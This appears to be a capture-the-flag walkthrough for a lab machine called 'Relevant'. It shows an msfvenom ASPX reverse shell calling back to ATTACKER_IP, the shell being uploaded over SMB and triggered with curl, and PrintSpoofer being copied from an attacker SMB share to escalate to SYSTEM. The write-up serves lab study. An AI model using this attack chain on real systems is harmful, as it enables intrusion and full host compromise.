Skip to main content

Relevant

MSFVENOM

  • Generating the PAYLOAD with MSFvenom after that we can Upload it to the SMB Share.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -f aspx > Rev_ASPX.aspx

SMB

  • Uploading the Reverse Shell Using SMB.
smb: \> put Rev_ASPX.aspx

Privilege Escalation

  • We can Execute the Reverse Shell by Navigating to the Target URL from the Browser or from the Command Line with curl or any other alternative.
attacker@machine:~$ curl "10.10.180.65:49663/nt4wrksv/Rev_ASPX.aspx"

  • We can catch the Reverse Shell Using netcat
  • These Privileges allow a Process to Impersonate other Users and act on their behalf: [SeImpersonate - SeAssignPrimaryToken]
  • We can use PrintSpoofer to accomplish this Task.
c:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
[..]
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
[..]

SMB

  • Using a Python SMB Server to Transfer Files to the Target Machine.
attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare

  • Copying PrintSpoofer64 from our SMB Server to the Target Machine.
C:\Windows\Temp> copy \\$ATTACKER_IP\LINUXSHARE\PrintSpoofer64.exe PrintSpoofer64.exe

Exploitation

It Might Be Necessary To Run PrintSpoofer Multiple Times Before Succeeding

  • Executing the PrintSpoofer64.exe Binary.
  • We have System Rights: NT AUTHORITY\SYSTEM
C:\Windows\Temp> PrintSpoofer64.exe -i -c powershell
PrintSpoofer64.exe -i -c powershell
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system